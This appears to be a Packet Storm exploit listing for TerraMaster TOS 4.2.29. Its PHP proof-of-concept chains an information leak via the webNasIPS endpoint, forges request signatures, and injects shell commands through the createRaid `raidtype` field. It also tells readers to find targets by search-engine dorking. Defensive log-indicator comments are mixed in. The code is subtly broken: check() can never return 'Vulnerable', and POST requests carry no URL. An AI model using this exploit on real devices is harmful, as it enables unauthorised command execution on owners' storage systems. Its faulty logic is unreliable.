
TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

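TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability that is reached by leveraging a local file inclusion vulnerability. In the proof of concept below, data read through `module/api.php?mobile/webNasIPS` is used to build the headers for a request to `module/api.php?mobile/createRaid`, whose `raidtype` field carries the injected command.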

Packet Storm
=============================================================================================================================================
| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 138 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the TerraMaster TOS 4.2.29 issue named in the banner above.
 *
 * Requests visible in this listing:
 *  - GET  tos/index.php?user/login          (parsed for a `ver=` string: version and CPU architecture)
 *  - POST module/api.php?mobile/webNasIPS   (response parsed for the `PWD:` and `mac":"` markers)
 *  - POST module/api.php?mobile/createRaid  (`raidtype` form field prefixed with `;`)
 *
 * Defensive reading: the Authorization, Signature and Timestamp values prepared for the
 * createRaid request are built only from data parsed out of the webNasIPS response plus the
 * caller's clock, so they are not a secret the caller must know in advance. Requests to these
 * two `mobile/` endpoints, the literal `TNAS` User-Agent value used here, and a `raidtype`
 * value containing shell metacharacters are the observable traits to look for in web-server
 * or reverse-proxy logs. Keeping the TOS management interface off untrusted networks removes
 * the exposure shown here. The page names 4.2.29 as affected and does not state a fixed release.
 *
 * NOTE(review): the device-side handling of `raidtype` is not shown on this page; the `;`
 * prefix suggests the value reaches a shell command line. Confirm against the vendor advisory.
 */
class TerraMasterExploit
{
    // Base URL of the device, normalised by the constructor to end in exactly one '/'.
    private $targetUri;
    // Values parsed from the webNasIPS response: password, mac, key, timestamp, signature.
    private $data = [];
    // Fingerprint parsed from the login page: cpu_arch, tos_version.
    private $terramaster = [];

    /**
     * @param string $targetUri Base URL of the device; trailing slashes are collapsed to one.
     */
    public function __construct($targetUri)
    {
        $this->targetUri = rtrim($targetUri, '/') . '/';
    }

    /**
     * Requests `module/api.php?mobile/webNasIPS` and, when the body contains the marker
     * 'webNasIPS successful', fills $this->data from the JSON `data` field.
     * $this->data stays empty when the request fails or the marker or `data` field is missing.
     *
     * @return void
     */
    public function getData()
    {
        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);

        if ($response && strpos($response, 'webNasIPS successful') !== false) {
            // Parse the JSON response and get the data
            $resJson = json_decode($response, true);
            if (!empty($resJson['data'])) {
                // Text between the 'PWD:' and 'SAT' markers; presumably a stored credential or
                // hash, whose exact format is not visible on this page.
                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);
                // Text between 'mac":"' and the next double quote.
                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);
                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries
                $this->data['timestamp'] = time();
                // derive signature
                // Defender note: both signature inputs (MAC fragment, timestamp) are available to
                // any client that can read the webNasIPS response.
                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);
            }
        }
    }

    /**
     * Returns the MD5 hex digest of $key concatenated with $strToEncrypt.
     *
     * @param string     $key
     * @param int|string $strToEncrypt
     * @return string 32-character hex digest
     */
    private function tosEncryptStr($key, $strToEncrypt)
    {
        $id = $key . $strToEncrypt;
        return md5($id);
    }

    /**
     * Submits a request to `module/api.php?mobile/createRaid` with `raidtype` set to ';' . $cmd
     * and a random `diskstring`. Reads password, signature and timestamp from $this->data, so
     * getData() must have filled them first. The response is discarded.
     *
     * @param string $cmd
     * @return void
     */
    public function executeCommand($cmd)
    {
        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
        $diskstring = $this->generateRandomString(4, 8);
        $headers = [
            'User-Agent' => 'TNAS',
            'Authorization' => $this->data['password'],
            'Signature' => $this->data['signature'],
            'Timestamp' => $this->data['timestamp']
        ];
        // Defender note: a `raidtype` value beginning with ';' (or containing other shell
        // metacharacters) in a createRaid request is the observable sign of this injection.
        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [
            'raidtype' => ';' . $cmd,
            'diskstring' => $diskstring
        ], $headers);
    }

    /**
     * Fetches `tos/index.php?user/login` and parses the first `ver=..."` occurrence into
     * $this->terramaster['cpu_arch'] and $this->terramaster['tos_version'].
     * $this->terramaster stays empty when the request fails or no `ver=` string is found.
     *
     * @return void
     */
    public function getTerramasterInfo()
    {
        // get Terramaster CPU architecture and TOS version
        $response = $this->sendRequest('GET', 'tos/index.php?user/login');
        if ($response) {
            preg_match('/ver=.+?"/', $response, $matches);
            if ($matches) {
                $version = $matches[0];
                // check if architecture is ARM64 or X64
                if (strpos($version, '_A') !== false) {
                    $this->terramaster['cpu_arch'] = 'ARM64';
                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {
                    $this->terramaster['cpu_arch'] = 'X64';
                } else {
                    $this->terramaster['cpu_arch'] = 'UNKNOWN';
                }
                // strip TOS version number and remove trailing double quote.
                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');
            }
        }
    }

    /**
     * Runs the fingerprint request and returns a status string that starts with 'Safe' or
     * 'Vulnerable'.
     *
     * 'Safe' is also returned when the login page could not be fetched or held no `ver=` string.
     * NOTE(review): do not treat a 'Safe' result from this routine as evidence that a device is
     * patched; confirm the installed TOS version on the device itself.
     *
     * @return string
     */
    public function check()
    {
        $this->getTerramasterInfo();
        if (empty($this->terramaster)) {
            return 'Safe';
        }
        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {
            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
        }
        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
    }

    /**
     * Calls getData() and then executeCommand() with the fixed string 'whoami'.
     *
     * @return void
     * @throws Exception when getData() left $this->data empty
     */
    public function exploit()
    {
        $this->getData();
        if (empty($this->data)) {
            throw new Exception('Cannot retrieve the leaked data.');
        }
        echo "Executing exploit...\n";
        // Example command to execute
        $this->executeCommand('whoami'); // Replace 'whoami' with desired command
    }

    /**
     * Builds a cURL option set for the request, executes it and returns the result.
     * The option set holds only the entries listed below; no timeout or TLS option is set.
     *
     * @param string $method  HTTP method; upper-cased before use
     * @param string $uri     Path appended to $this->targetUri
     * @param array  $data    Form fields, URL-encoded with http_build_query() for POST
     * @param array  $headers Merged after the default Content-Type header
     * @return string|false   Result of curl_exec() with CURLOPT_RETURNTRANSFER enabled
     */
    private function sendRequest($method, $uri, $data = [], $headers = [])
    {
        $url = $this->targetUri . $uri;
        $options = [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_CUSTOMREQUEST => strtoupper($method),
            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)
        ];
        if (strtoupper($method) === 'POST') {
            $options[CURLOPT_POSTFIELDS] = http_build_query($data);
        } else {
            $options[CURLOPT_URL] = $url;
        }
        $ch = curl_init();
        curl_setopt_array($ch, $options);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Returns a string of upper-case A-Z letters whose length is picked with rand() between
     * $minLength and $maxLength. In this listing it only supplies the `diskstring` field.
     *
     * @param int $minLength
     * @param int $maxLength
     * @return string
     */
    private function generateRandomString($minLength, $maxLength)
    {
        $length = rand($minLength, $maxLength);
        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);
    }
}

// Usage
// The URL below is the listing's placeholder. check() runs first, and exploit() is called only
// when the returned status string contains 'Vulnerable'.
$exploit = new TerraMasterExploit('http://target-terramaster-url.com');
$check = $exploit->check();
echo $check . "\n";
if (strpos($check, 'Vulnerable') !== false) {
    $exploit->exploit();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
